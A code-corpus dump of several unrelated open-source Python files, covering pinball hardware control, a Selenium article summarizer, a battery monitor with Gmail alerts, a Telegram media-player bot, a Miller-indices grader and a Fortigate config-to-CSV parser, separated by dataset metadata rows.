switch_num = self.switches[bumper].number
coil = self.coils[bumper]
drivers = []
if enable:
drivers += [pinproc.driver_state_pulse(coil.state(), coil.default_pulse_time)]
self.proc.switch_update_rule(switch_num, 'closed_nondebounced', {'notifyHost':False, 'reloadActive':True}, drivers, False)
def install_switch_rule_coil_disable(self, switch_num, switch_state, coil_name, notify_host, enable, reload_active = False, drive_coil_now_if_valid=False):
coil = self.coils[coil_name];
drivers = []
if enable:
drivers += [pinproc.driver_state_disable(coil.state())]
self.proc.switch_update_rule(switch_num, switch_state, {'notifyHost':notify_host, 'reloadActive':reload_active}, drivers, drive_coil_now_if_valid)
def install_switch_rule_coil_pulse(self, switch_num, switch_state, coil_name, pulse_duration, notify_host, enable, reload_active = False, drive_coil_now_if_valid=False):
coil = self.coils[coil_name];
drivers = []
if enable:
drivers += [pinproc.driver_state_pulse(coil.state(),pulse_duration)]
self.proc.switch_update_rule(switch_num, switch_state, {'notifyHost':notify_host, 'reloadActive':reload_active}, drivers, drive_coil_now_if_valid)
def install_switch_rule_coil_schedule(self, switch_num, switch_state, coil_name, schedule, schedule_seconds, now, notify_host, enable, reload_active = False, drive_coil_now_if_valid=False):
coil = self.coils[coil_name];
drivers = []
if enable:
drivers += [pinproc.driver_state_schedule(coil.state(),schedule,schedule_seconds,now)]
self.proc.switch_update_rule(switch_num, switch_state, {'notifyHost':notify_host, 'reloadActive':reload_active}, drivers, drive_coil_now_if_valid)
def install_switch_rule_coil_patter(self, switch_num, switch_state, coil_name, milliseconds_on, milliseconds_off, original_on_time, notify_host, enable, reload_active = False, drive_coil_now_if_valid=False):
coil = self.coils[coil_name];
drivers = []
if enable:
drivers += [pinproc.driver_state_patter(coil.state(),milliseconds_on,milliseconds_off,original_on_time, True)]
self.proc.switch_update_rule(switch_num, switch_state, {'notifyHost':notify_host, 'reloadActive':reload_active}, drivers, drive_coil_now_if_valid)
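    # Illustrative sketch (not part of the original API): how the rule helpers
    # above are typically used, e.g. to fire a slingshot coil directly from its
    # switch without a round trip to the host.  The switch and coil names below
    # are hypothetical placeholders.
    def _example_install_slingshot_rule(self):
        sw = self.switches['slingL'].number
        self.install_switch_rule_coil_pulse(sw, 'closed_nondebounced', 'slingLMain', 20, True, True)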
def process_event(self, event):
event_type = event['type']
event_value = event['value']
if event_type == 99: # CTRL-C to quit
print "CTRL-C detected, quiting..."
self.end_run_loop()
elif event_type == pinproc.EventTypeDMDFrameDisplayed: # DMD events
# print "% 10.3f Frame event. Value=%x" % (time.time()-self.t0, event_value)
self.dmd_event()
elif event_type == pinproc.EventTypeBurstSwitchOpen or \
event_type == pinproc.EventTypeBurstSwitchClosed:
self.burst_event(event)
elif event_type == pinproc.EventTypeSwitchClosedDebounced or \
event_type == pinproc.EventTypeSwitchOpenDebounced or \
event_type == pinproc.EventTypeSwitchClosedNondebounced or \
event_type == pinproc.EventTypeSwitchOpenNondebounced:
self.switch_event(event)
else:
self.other_event(event)
def other_event(self, event):
self.logger.warning("Unknown event type received. Type:%d, Value:%s." % (event['type'], event['value']))
def switch_event(self, event):
event_type = event['type']
event_value = event['value']
try:
sw = self.switches[event_value]
if 'time' in event:
sw.hw_timestamp = event['time']
except KeyError:
self.logger.warning("Received switch event but couldn't find switch %s." % event_value)
return
if sw.debounce:
recvd_state = event_type == pinproc.EventTypeSwitchClosedDebounced
else:
recvd_state = event_type == pinproc.EventTypeSwitchClosedNondebounced
if sw.state != recvd_state:
sw.set_state(recvd_state)
self.logger.info("%s:\t%s\t(%s)", sw.name, sw.state_str(),event_type)
self.modes.handle_event(event)
sw.reset_timer()
else:
#self.logger.warning("DUPLICATE STATE RECEIVED, IGNORING: %s:\t%s", sw.name, sw.state_str())
pass
def burst_event(self, event):
pass
def update_lamps(self):
for mode in reversed(self.modes.modes):
mode.update_lamps()
def end_run_loop(self):
"""Called by the programmer when he wants the run_loop to end"""
self.done = True
def log(self, line):
"""Deprecated; use :attr:`logger` to log messages."""
self.logger.info(line)
def get_events(self):
"""Called by :meth:`run_loop` once per cycle to get the events to process during
this cycle of the run loop.
"""
events = []
events.extend(self.proc.get_events())
events.extend(self.get_virtualDMDevents()) # MJO: changed to support fake DMD w/o h/w DMD
return events
def tick_virtual_drivers(self):
for coil in self.coils:
coil.tick()
for lamp in self.lamps:
lamp.tick()
for led in self.leds:
led.tick()
def LED_event(self):
if self.LEDs:
self.LEDs.update()
# MJO: added to support virtual DMD only (i.e., without hardware)
last_dmd_event = 0.0
frames_per_second = 30
rem_frames = 0.0
def get_virtualDMDevents(self):
""" Get all switch and DMD events since the last time this was called. """
events = []
now = time.time()
frame_interval = float(1/float(self.frames_per_second))
seconds_since_last_dmd_event = now - self.last_dmd_event
f_frames_past = float(seconds_since_last_dmd_event / float(frame_interval))
f_full_frames = f_frames_past + float(self.rem_frames)
i_full_frames = int(f_full_frames)
i_full_frames = min(i_full_frames, 16)
missed_dmd_events = i_full_frames
if missed_dmd_events > 0:
self.rem_frames = f_full_frames-i_full_frames
if(missed_dmd_events>1):
pass
# print ("-----")
# print("DMDMDMDMDMD FRAMES PAST (by time): " + str(f_frames_past))
# print("DMDMDMDMDMD rem FRAMES: " + str(self.rem_frames))
# print("DMDMDMDMDMD missed FRAMES: " + str(i_full_frames))
# print("DMDMDMDMDMD CARRY FRAMES: " + str(self.rem_frames))
self.last_dmd_event = now
events.extend([{'type':pinproc.EventTypeDMDFrameDisplayed, 'value':0}] * missed_dmd_events)
return events
def run_loop(self, min_seconds_per_cycle=None):
"""Called by the programmer to read and process switch events until interrupted."""
loops = 0
self.done = False
self.last_dmd_event = time.time()
self.run_started = self.last_dmd_event
self.dmd_updates = 0
self.dmd_event()
try:
while self.done == False:
if min_seconds_per_cycle:
t0 = time.time()
loops += 1
for event in self.get_events():
self.process_event(event)
self.tick()
self.tick_virtual_drivers()
self.modes.tick()
self.LED_event()
if self.proc:
self.proc.watchdog_tickle()
self.proc.flush()
if self.modes.changed:
self.modes.logger.info("Modes changed in last run loop cycle, now:")
self.modes.log_queue()
self.modes.changed = False
if min_seconds_per_cycle:
dt = time.time() - t0
if min_seconds_per_cycle > dt:
time.sleep(min_seconds_per_cycle - dt)
finally:
if loops != 0:
dt = time.time()-self.t0
dd = time.time() - self.run_started
self.logger.info("\nTotal Time: %0.3f Seconds",dt)
self.logger.info("Loops: " + str(loops))
if(dd > 0):
self.logger.info("Overall loop rate: %0.3fHz", (loops/dd))
self.logger.info("Frame rate: %0.3fFPS", (self.dmd_updates/dd))
if(self.dmd_updates>0):
self.logger.info("DMD Updates: %s", str(self.dmd_updates))
self.logger.info("loops between dmd updates: %0.3f", (loops/self.dmd_updates))
#unload OSC server
try:
self.osc.OSC_shutdown()
except:
pass
| mit | 6,916,193,888,872,393,000 | 43.902887 | 211 | 0.573679 | false |
Faeriol/news-summarizer | summarizer.py | 1 | 3274 | import os
from goose3 import Goose
from selenium import webdriver
from selenium.common.exceptions import UnexpectedAlertPresentException, SessionNotCreatedException, WebDriverException
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lsa import LsaSummarizer as Summarizer
from sumy.nlp.stemmers import Stemmer
from sumy.utils import get_stop_words
os.environ['MOZ_HEADLESS'] = '1' # Should be moved out
LANGUAGE = "english" # Should be config option
class NotEnoughContent(Exception):
def __init__(self, url: str) -> None:
super().__init__("Not enough content for: {}".format(url))
class InvalidContent(Exception):
def __init__(self, url: str) -> None:
super().__init__("Content appears invalid for: {}".format(url))
class BrowserSummarizer(object):
def __init__(self, language: str, sentence_count: int) -> None:
self.language = language
self.sentence_count = sentence_count
self.browser = None
self.goose = Goose({"enable_image_fetching": False})
self.stemmer = Stemmer(language)
self.tokenizer = Tokenizer(language)
self.summarizer = Summarizer(self.stemmer)
self.summarizer.stop_words = get_stop_words(language)
def init(self) -> None:
if self.browser:
self.done()
self.browser = webdriver.Firefox()
def __enter__(self):
self.init()
return self
def __exit__(self, *args):
self.done()
def _blank(self):
"""
Empty browser, do not kill instance
"""
try:
self.browser.get("about:blank")
except UnexpectedAlertPresentException:
self.browser.switch_to.alert()
self.browser.switch_to.alert().dismiss()
def parse_url(self, url: str) -> (str, str):
"""
        Retrieve the given URL and parse it.
:param url: The URL to parse
:return: The resolved URL, the parsed content
"""
try:
self.browser.get(url)
except UnexpectedAlertPresentException:
self.browser.switch_to.alert()
self.browser.switch_to.alert().dismiss()
self.browser.get(url)
except WebDriverException:
raise InvalidContent(url)
        try:  # Dismiss any alerts that might block the page
self.browser.switch_to.alert()
self.browser.switch_to.alert().dismiss()
except Exception:
pass
try:
contents = self.goose.extract(raw_html=self.browser.page_source)
cleaned_url = self.browser.current_url
except IndexError:
raise InvalidContent(url)
finally:
self._blank()
parser = PlaintextParser.from_string(contents.cleaned_text, self.tokenizer)
sentences = self.summarizer(parser.document, self.sentence_count)
if len(sentences) < self.sentence_count:
raise NotEnoughContent(url)
return cleaned_url, " ".join(str(sentence) for sentence in sentences)
def done(self) -> None:
self.browser.close()
try:
self.browser.quit()
except SessionNotCreatedException:
pass
self.browser = None
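# Added illustrative usage sketch (not part of the original module). The URL is
# a placeholder assumption; a local Firefox/geckodriver install and network
# access are required for it to actually run.
if __name__ == "__main__":
    with BrowserSummarizer(LANGUAGE, sentence_count=3) as summarizer:
        resolved_url, summary = summarizer.parse_url("https://example.com/article")
        print(resolved_url)
        print(summary)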
| mit | -2,505,183,108,841,201,700 | 32.408163 | 118 | 0.626145 | false |
corerd/PyDomo | powerman/pwrmonitor.py | 1 | 6768 | #!/usr/bin/env python
#
# The MIT License (MIT)
#
# Copyright (c) 2019 Corrado Ubezio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import print_function
import logging
import json
import inspect
from sys import stderr
from time import strftime
from datetime import datetime
from os.path import dirname, join
from apiclient import errors
from traceback import format_exc
from powerman.upower import UPowerManager
from cloud.upload import upload_datastore
from cloud.googleapis.gmailapi import gmSend
from cloud.cloudcfg import ConfigDataLoad, checkDatastore
# Globals
VERSION = '1.0'
VERSION_DATE = '2019'
# Cloud configuration file taken from the cloud package
DEFAULT_CFG_FILE = 'cloudcfg.json'
DEFAULT_CFG_FILE_PATH = join(dirname(inspect.getfile(ConfigDataLoad)),
DEFAULT_CFG_FILE)
# Power supply type IDs
PSU_UNKNOWN = -1
PSU_AC = 0
PSU_BATTERY = 1
# Power supply type string description
PSU_AC_DESC = "AC_ADAPTER"
PSU_BATTERY_DESC = "BATTERY"
# Files keeping power supply state
LOG_FILE = 'pwrmonitor-log.txt'
PSU_TYPE_FILE = 'pwrmonitor.json'
DEFAULT_PSU_CFG = \
{
'power-supply': 'UNKNOWN'
}
USAGE = '''Check power supply type and if it is switched to battery
then send an email alert message from the user's Gmail account.
Events are logged in CSV format: datetime;level;message
Email address of the receiver and datastore path are taken from a configuration
file in JSON format.
If none is given, the configuration is read from the file:
%s
''' % DEFAULT_CFG_FILE_PATH
def print_error(msg):
print('%s;%s' % (strftime("%Y-%m-%d %H:%M:%S"), msg), file=stderr)
def psu_type_getFromCfg(cfg_data):
"""Get the power supply type from configuration data
Args:
cfg_data: PSU configuration data
Returns:
PSU_UNKNOWN
PSU_AC
PSU_BATTERY
"""
psu_type_desc = cfg_data['power-supply']
if psu_type_desc == PSU_BATTERY_DESC:
return PSU_BATTERY
elif psu_type_desc == PSU_AC_DESC:
return PSU_AC
return PSU_UNKNOWN
def psu_type_getFromDevice():
"""Get the power supply type from UPowerManager
Returns:
PSU_AC
PSU_BATTERY
"""
pwrMan = UPowerManager()
# Get the Devices List searching for a battery
battery_device = None
for dev in pwrMan.detect_devices():
if 'battery' in dev:
battery_device = dev
break
if not battery_device:
# no battery device found:
# power supply is external
return PSU_AC
if 'discharg' in pwrMan.get_state(battery_device).lower():
        # The battery power allowed states:
# "Unknown"
# "Loading" (that is Charging)
# "Discharging"
# "Empty"
# "Fully charged"
# "Pending charge"
# "Pending discharge"
return PSU_BATTERY
return PSU_AC
def alert_send(to, message_text):
"""Send an alert email message from the user's account
    to the email address taken from the configuration file.
Args:
to: Email address of the receiver.
message_text: The text of the alert message.
Returns:
Success.
"""
subject = 'PSU Alert at ' + datetime.now().strftime("%d-%m-%Y %H:%M:%S")
success = -1
try:
gmSend(to, subject, message_text)
except errors.HttpError as e:
logging.error('HttpError occurred: %s' % e)
except Exception:
logging.error(format_exc())
else:
logging.info(message_text)
success = 0
return success
def main():
print('pwrmonitor v%s - (C) %s' % (VERSION, VERSION_DATE))
# get the configuration data
try:
cloud_cfg = ConfigDataLoad(DEFAULT_CFG_FILE_PATH)
except Exception as e:
print_error('cloud configuration: unable to load %s' % DEFAULT_CFG_FILE_PATH)
print_error('cloud configuration exception: %s' % type(e).__name__)
print_error('cloud configuration: %s' % str(e))
return -1
try:
log_file = join(cloud_cfg.data['datastore'], LOG_FILE)
except KeyError:
print_error("Keyword 'datastore' not found in file %s" %
DEFAULT_CFG_FILE_PATH)
return -1
try:
receiver_address = cloud_cfg.data['alert-receiver-address']
except KeyError:
print_error("Keyword 'alert-receiver-address' not found in file %s" %
DEFAULT_CFG_FILE_PATH)
return -1
# logger setup
if checkDatastore(log_file) is not True:
print_error("Cannot access %s directory" % cloud_cfg.data['datastore'])
return -1
logging.basicConfig(filename=log_file,
format='%(asctime)s;%(levelname)s;%(message)s',
level=logging.DEBUG)
# check PSU type
psu_switch2battery = 0
psu_cfg_file = join(cloud_cfg.data['datastore'], PSU_TYPE_FILE)
psu_cfg = ConfigDataLoad(psu_cfg_file, DEFAULT_PSU_CFG)
psu_type_prev = psu_type_getFromCfg(psu_cfg.data)
psu_type_current = psu_type_getFromDevice()
if psu_type_current != psu_type_prev:
if psu_type_current == PSU_BATTERY:
psu_type_desc = PSU_BATTERY_DESC
else:
psu_type_desc = PSU_AC_DESC
logging.info('power supply switched to {}'.format(psu_type_desc))
psu_cfg.data['power-supply'] = psu_type_desc
psu_cfg.update()
if psu_type_current == PSU_BATTERY:
psu_switch2battery = 1
logging.debug('send alert')
alert_send(receiver_address, 'AC power adapter has been unplugged.')
upload_datastore(cloud_cfg.data['datastore'])
return psu_switch2battery
if __name__ == "__main__":
exit(main())
| mit | -1,850,814,616,450,463,200 | 30.18894 | 85 | 0.655585 | false |
David-Estevez/telegram-bots | JukeBot/JukeBot.py | 1 | 3850 | #########################################################################
##
## JukeBot - Telegram bot to control a media player
##
#########################################################################
import ConfigParser
import os
import re, string
from twx.botapi import TelegramBot, ReplyKeyboardMarkup
from MediaPlayer import MediaPlayer
__author__ = 'def'
### Basic bot things ####################################
def load_last_id():
if not os.path.isfile('id'):
save_last_id(0)
return 0
with open('id', 'r') as f:
return int(f.readline())
def save_last_id(last_id):
with open('id', 'w') as f:
f.write(str(last_id))
def save_log(id, update_id, chat_id, text):
with open('log.txt', 'a') as f:
f.write(str((id, update_id, chat_id, text))+'\n')
### JukeBot things #######################################
def send_keyboard(bot, user_id):
keyboard_layout = [['Play >'], ['Previous <<', 'Next >>'], ['Pause []'] ]
reply_markup = ReplyKeyboardMarkup.create(keyboard_layout)
bot.send_message(user_id, 'This is JukeBot!\nWelcome, user', reply_markup=reply_markup)
def main():
print '[+] Starting bot...'
# Read the config file
print '[+] Reading config file...'
config = ConfigParser.ConfigParser()
config.read([os.path.expanduser('./config')])
# Read data
bot_name = config.get('bot', 'name')
bot_token = config.get('bot', 'token')
user_id = config.get('user', 'allowed')
# Last mssg id:
last_id = int(load_last_id())
print '[+] Last id: %d' % last_id
# Configure regex
regex = re.compile('[%s]' % re.escape(string.punctuation))
# Create bot
print '[+] Connecting bot...'
bot = TelegramBot(bot_token)
bot.update_bot_info().wait()
print '\tBot connected! Bot name: %s' % bot.username
# Create media player controllers:
player = MediaPlayer()
if not player.connect_to_player():
print 'Error connecting to player. Exiting...'
return -1
# Send special keyboard:
send_keyboard(bot, user_id)
while True:
try:
updates = bot.get_updates(offset=last_id).wait()
for update in updates:
id = update.message.message_id
update_id = update.update_id
user = update.message.sender
chat_id = update.message.chat.id
text = update.message.text
if int(update_id) > last_id:
last_id = update_id
save_last_id(last_id)
save_log(id, update_id, chat_id, text)
#text = regex.sub('', text)
words = text.split()
for word in words:
# Process commands:
if word == '/start':
print "New user started the app: " + str(user)
# Restricted API
if int(user_id) == user.id:
if 'Play' in word:
print '[+] Play command'
player.play()
elif 'Pause' in word:
print '[+] Pause command'
player.pause()
elif 'Previous' in word:
print '[+] Previous command'
player.previous()
elif 'Next' in word:
print '[+] Next command'
player.next()
except (KeyboardInterrupt, SystemExit):
print '\nkeyboardinterrupt caught (again)'
print '\n...Program Stopped Manually!'
raise
if __name__ == '__main__':
main()
| gpl-2.0 | 314,643,668,958,966,200 | 31.083333 | 91 | 0.473247 | false |
jolyonb/edx-platform | common/lib/chem/chem/miller.py | 1 | 9303 | """ Calculation of Miller indices """
from __future__ import absolute_import
import decimal
import fractions as fr
import json
import math
import numpy as np
from six.moves import map
from six.moves import range
from functools import reduce
def lcm(a, b):
"""
Returns least common multiple of a, b
Args:
a, b: floats
Returns:
float
"""
return a * b / fr.gcd(a, b)
def segment_to_fraction(distance):
"""
    Converts the lengths at which the plane cuts the axes to fractions.
    Tries to convert the distance to the closest nice fraction with denominator
    less than or equal to 10. This is
    purely for simplicity and clarity of learning purposes. Jenny: 'In typical
courses students usually do not encounter indices any higher than 6'.
If distance is not a number (numpy nan), it means that plane is parallel to
axis or contains it. Inverted fraction to nan (nan is 1/0) = 0 / 1 is
returned
Generally (special cases):
    a) if distance is smaller than some constant, e.g. 0.01011,
    then the fraction's denominator is usually much greater than 10.
b) Also, if student will set point on 0.66 -> 1/3, so it is 333 plane,
But if he will slightly move the mouse and click on 0.65 -> it will be
(16,15,16) plane. That's why we are doing adjustments for points coordinates,
to the closest tick, tick + tick / 2 value. And now UI sends to server only
values multiple to 0.05 (half of tick). Same rounding is implemented for
unittests.
But if one will want to calculate miller indices with exact coordinates and
    with nice fractions (which produce small Miller indices), he may want to shift
to new origin if segments are like S = (0.015, > 0.05, >0.05) - close to zero
in one coordinate. He may update S to (0, >0.05, >0.05) and shift origin.
    In this way he can receive nice small fractions. Also there can be a
    degenerate case when S = (0.015, 0.012, >0.05) - if S is updated to (0, 0, >0.05) -
    it is a line. This case should be considered separately. Small nice Miller
    numbers and the possibility to create very small segments cannot be implemented
    at the same time).
Args:
distance: float distance that plane cuts on axis, it must not be 0.
Distance is multiple of 0.05.
Returns:
Inverted fraction.
0 / 1 if distance is nan
"""
if np.isnan(distance):
return fr.Fraction(0, 1)
else:
fract = fr.Fraction(distance).limit_denominator(10)
return fr.Fraction(fract.denominator, fract.numerator)
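# Added illustrative sketch (not part of the original module): a quick check of
# segment_to_fraction on two representative inputs; the chosen values are
# assumptions for demonstration only.
def _demo_segment_to_fraction():
    # plane cuts the axis at 0.5 -> fraction 1/2 -> inverted to 2/1
    assert segment_to_fraction(0.5) == fr.Fraction(2, 1)
    # nan means the plane is parallel to the axis -> inverted fraction is 0/1
    assert segment_to_fraction(np.nan) == fr.Fraction(0, 1)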
def sub_miller(segments):
'''
Calculates Miller indices from segments.
Algorithm:
1. Obtain inverted fraction from segments
2. Find common denominator of inverted fractions
3. Lead fractions to common denominator and throws denominator away.
4. Return obtained values.
Args:
List of 3 floats, meaning distances that plane cuts on x, y, z axes.
Any float not equals zero, it means that plane does not intersect origin,
i. e. shift of origin has already been done.
Returns:
String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2)
'''
fracts = [segment_to_fraction(segment) for segment in segments]
common_denominator = reduce(lcm, [fract.denominator for fract in fracts])
miller_indices = ([
fract.numerator * math.fabs(common_denominator) / fract.denominator
for fract in fracts
])
    return '(' + ','.join(map(str, list(map(decimal.Decimal, miller_indices)))) + ')'
def miller(points):
"""
Calculates Miller indices from points.
Algorithm:
    1. Calculate the normal vector to a plane that goes through all points.
2. Set origin.
3. Create Cartesian coordinate system (Ccs).
4. Find the lengths of segments of which the plane cuts the axes. Equation
of a line for axes: Origin + (Coordinate_vector - Origin) * parameter.
    5. If plane goes through Origin:
a) Find new random origin: find unit cube vertex, not crossed by a plane.
b) Repeat 2-4.
c) Fix signs of segments after Origin shift. This means to consider
        original directions of axes. E.g.: Origin was 0,0,0 and became
new_origin. If new_origin has same Y coordinate as Origin, then segment
does not change its sign. But if new_origin has another Y coordinate than
origin (was 0, became 1), than segment has to change its sign (it now
lies on negative side of Y axis). New Origin 0 value of X or Y or Z
coordinate means that segment does not change sign, 1 value -> does
change. So new sign is (1 - 2 * new_origin): 0 -> 1, 1 -> -1
6. Run function that calculates miller indices from segments.
Args:
List of points. Each point is list of float coordinates. Order of
coordinates in point's list: x, y, z. Points are different!
Returns:
String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2)
"""
N = np.cross(points[1] - points[0], points[2] - points[0])
O = np.array([0, 0, 0])
P = points[0] # point of plane
Ccs = list(map(np.array, [[1.0, 0, 0], [0, 1.0, 0], [0, 0, 1.0]]))
segments = ([
np.dot(P - O, N) / np.dot(ort, N) if np.dot(ort, N) != 0
else np.nan for ort in Ccs
])
if any(x == 0 for x in segments): # Plane goes through origin.
vertices = [
# top:
np.array([1.0, 1.0, 1.0]),
np.array([0.0, 0.0, 1.0]),
np.array([1.0, 0.0, 1.0]),
np.array([0.0, 1.0, 1.0]),
# bottom, except 0,0,0:
np.array([1.0, 0.0, 0.0]),
np.array([0.0, 1.0, 0.0]),
np.array([1.0, 1.0, 1.0]),
]
for vertex in vertices:
if np.dot(vertex - O, N) != 0: # vertex not in plane
new_origin = vertex
break
# obtain new axes with center in new origin
X = np.array([1 - new_origin[0], new_origin[1], new_origin[2]])
Y = np.array([new_origin[0], 1 - new_origin[1], new_origin[2]])
Z = np.array([new_origin[0], new_origin[1], 1 - new_origin[2]])
new_Ccs = [X - new_origin, Y - new_origin, Z - new_origin]
segments = ([np.dot(P - new_origin, N) / np.dot(ort, N) if
np.dot(ort, N) != 0 else np.nan for ort in new_Ccs])
# fix signs of indices: 0 -> 1, 1 -> -1 (
segments = (1 - 2 * new_origin) * segments
return sub_miller(segments)
def grade(user_input, correct_answer):
'''
Grade crystallography problem.
Returns true if lattices are the same and Miller indices are same or minus
same. E.g. (2,2,2) = (2, 2, 2) or (-2, -2, -2). Because sign depends only
on student's selection of origin.
Args:
user_input, correct_answer: json. Format:
user_input: {"lattice":"sc","points":[["0.77","0.00","1.00"],
["0.78","1.00","0.00"],["0.00","1.00","0.72"]]}
correct_answer: {'miller': '(00-1)', 'lattice': 'bcc'}
"lattice" is one of: "", "sc", "bcc", "fcc"
Returns:
True or false.
'''
def negative(m):
"""
Change sign of Miller indices.
Args:
m: string with meaning of Miller indices. E.g.:
(-6,3,-6) -> (6, -3, 6)
Returns:
String with changed signs.
"""
output = ''
i = 1
while i in range(1, len(m) - 1):
if m[i] in (',', ' '):
output += m[i]
elif m[i] not in ('-', '0'):
output += '-' + m[i]
elif m[i] == '0':
output += m[i]
else:
i += 1
output += m[i]
i += 1
return '(' + output + ')'
def round0_25(point):
"""
        Rounds point coordinates to the closest 0.05 value.
Args:
point: list of float coordinates. Order of coordinates: x, y, z.
Returns:
            list of coordinates rounded to the closest 0.05 value
"""
rounded_points = []
for coord in point:
base = math.floor(coord * 10)
fractional_part = (coord * 10 - base)
aliquot0_25 = math.floor(fractional_part / 0.25)
if aliquot0_25 == 0.0:
rounded_points.append(base / 10)
if aliquot0_25 in (1.0, 2.0):
rounded_points.append(base / 10 + 0.05)
if aliquot0_25 == 3.0:
rounded_points.append(base / 10 + 0.1)
return rounded_points
user_answer = json.loads(user_input)
if user_answer['lattice'] != correct_answer['lattice']:
return False
points = [list(map(float, p)) for p in user_answer['points']]
if len(points) < 3:
return False
    # round point to closest 0.05 value
points = [round0_25(point) for point in points]
points = [np.array(point) for point in points]
# print miller(points), (correct_answer['miller'].replace(' ', ''),
# negative(correct_answer['miller']).replace(' ', ''))
if miller(points) in (correct_answer['miller'].replace(' ', ''), negative(correct_answer['miller']).replace(' ', '')):
return True
return False
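# Added illustrative usage sketch (not part of the original module). The three
# points below are an assumed example: the plane through them cuts each axis at
# 1, so miller() should report the (1,1,1) plane.
if __name__ == '__main__':
    example_points = [np.array([1.0, 0.0, 0.0]),
                      np.array([0.0, 1.0, 0.0]),
                      np.array([0.0, 0.0, 1.0])]
    print(miller(example_points))  # expected output: (1,1,1)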
| agpl-3.0 | 2,638,268,032,322,332,000 | 32.584838 | 122 | 0.5868 | false |
maaaaz/fgpoliciestocsv | fgaddressestocsv.py | 1 | 6306 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is part of fgpoliciestocsv.
#
# Copyright (C) 2014, 2020, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# fgpoliciestocsv is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# fgpoliciestocsv is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with fgpoliciestocsv. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from os import path
import io
import sys
import re
import csv
import os
# OptionParser imports
from optparse import OptionParser
from optparse import OptionGroup
# Options definition
parser = OptionParser(usage="%prog [options]")
main_grp = OptionGroup(parser, 'Main parameters')
main_grp.add_option('-i', '--input-file', help='Partial or full Fortigate configuration file. Ex: fgfw.cfg')
main_grp.add_option('-o', '--output-file', help='Output csv file (default ./addresses-out.csv)', default=path.abspath(path.join(os.getcwd(), './addresses-out.csv')))
main_grp.add_option('-s', '--skip-header', help='Do not print the csv header', action='store_true', default=False)
main_grp.add_option('-n', '--newline', help='Insert a newline between each group for better readability', action='store_true', default=False)
main_grp.add_option('-d', '--delimiter', help='CSV delimiter (default ";")', default=';')
main_grp.add_option('-e', '--encoding', help='Input file encoding (default "utf8")', default='utf8')
parser.option_groups.extend([main_grp])
# Python 2 and 3 compatibility
if (sys.version_info < (3, 0)):
fd_read_options = 'r'
fd_write_options = 'wb'
else:
fd_read_options = 'r'
fd_write_options = 'w'
# Handful patterns
# -- Entering address definition block
p_entering_address_block = re.compile(r'^\s*config firewall address$', re.IGNORECASE)
# -- Exiting address definition block
p_exiting_address_block = re.compile(r'^end$', re.IGNORECASE)
# -- Committing the current address definition and going to the next one
p_address_next = re.compile(r'^next$', re.IGNORECASE)
# -- Address name
p_address_name = re.compile(r'^\s*edit\s+"(?P<address_name>.*)"$', re.IGNORECASE)
# -- Address setting
p_address_set = re.compile(r'^\s*set\s+(?P<address_key>\S+)\s+(?P<address_value>.*)$', re.IGNORECASE)
# Functions
def parse(options):
"""
Parse the data according to several regexes
    @param options: parsed command-line options
    @rtype: return a list of addresses ( [ {'name' : 'intranet', 'subnet' : '10.0.0.0 255.0.0.0', ...}, {'name' : 'dmz', ...}, ... ] )
    and the list of unique seen keys ['name', 'subnet', ...]
"""
global p_entering_address_block, p_exiting_address_block, p_address_next, p_address_name, p_address_set
in_address_block = False
address_list = []
address_elem = {}
order_keys = []
with io.open(options.input_file, mode=fd_read_options, encoding=options.encoding) as fd_input:
for line in fd_input:
line = line.strip()
# We match a address block
if p_entering_address_block.search(line):
in_address_block = True
# We are in a address block
if in_address_block:
if p_address_name.search(line):
address_name = p_address_name.search(line).group('address_name')
address_elem['name'] = address_name
if not('name' in order_keys):
order_keys.append('name')
# We match a setting
if p_address_set.search(line):
address_key = p_address_set.search(line).group('address_key')
if not(address_key in order_keys):
order_keys.append(address_key)
address_value = p_address_set.search(line).group('address_value').strip()
address_value = re.sub('["]', '', address_value)
address_elem[address_key] = address_value
# We are done with the current address id
if p_address_next.search(line):
address_list.append(address_elem)
address_elem = {}
# We are exiting the address block
if p_exiting_address_block.search(line):
in_address_block = False
return (address_list, order_keys)
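# Added illustrative note (not part of the original script): for a configuration
# block such as
#
#   config firewall address
#       edit "intranet"
#           set subnet 10.0.0.0 255.0.0.0
#       next
#   end
#
# parse() would return ([{'name': 'intranet', 'subnet': '10.0.0.0 255.0.0.0'}],
# ['name', 'subnet']).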
def generate_csv(results, keys, options):
"""
Generate a plain csv file
"""
if results and keys:
with io.open(options.output_file, mode=fd_write_options) as fd_output:
spamwriter = csv.writer(fd_output, delimiter=options.delimiter, quoting=csv.QUOTE_ALL, lineterminator='\n')
if not(options.skip_header):
spamwriter.writerow(keys)
for address in results:
output_line = []
for key in keys:
if key in address.keys():
output_line.append(address[key])
else:
output_line.append('')
spamwriter.writerow(output_line)
if options.newline:
spamwriter.writerow('')
fd_output.close()
return None
def main():
"""
Dat main
"""
global parser
options, arguments = parser.parse_args()
if (options.input_file == None):
